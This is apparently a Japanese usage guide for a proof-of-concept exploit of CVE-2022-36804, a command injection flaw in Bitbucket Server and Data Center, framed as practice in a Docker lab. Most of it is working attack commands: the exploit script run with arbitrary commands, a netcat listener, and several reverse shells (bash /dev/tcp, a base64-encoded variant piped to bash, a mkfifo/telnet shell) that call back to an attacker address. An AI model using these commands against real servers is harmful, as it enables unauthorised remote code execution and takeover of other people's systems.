
Atlassian Bitbucket ServerおよびData Centerの複数のAPIエンドポイントにおいて、重大なコマンドインジェクションの脆弱性が発見されました。この脆弱性は、バージョン<7.6.17、<7.17.10、<7.21.4、<8.0.3、<8.1.2、<8.2.2、および<8.3.1より前にリリースされたすべてのバージョンのBitbucket ServerおよびData Centerに影響します。
Atlassian Bitbucket Server および Data Center の複数の API エンドポイントに、重大なコマンドインジェクションの脆弱性が発見されました。この脆弱性は、<7.6.17、<7.17.10、<7.21.4、<8.0.3、<8.1.2、<8.2.2、<8.3.1 より前にリリースされたすべてのバージョンの Bitbucket Server および Data Center に影響します。
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7
172.17.0.3 をあなたのローカルIPアドレスに置き換えてください
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"
次のコマンドで netcat リスナーを起動します:
nc -lvp 4444
ペイロード実行エラーに備えて、/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 を base64 に変換します。
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"
それでもエラーが発生する場合は、以下のコマンドを実行してください:
TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"
練習用として、Windows/Linux マシンに脆弱性のあるバージョンの Bitbucket Server をインストールすることをお勧めします。Docker イメージと比較して、リバースシェルを取得しやすくなります。
詳細はこちらをご覧ください。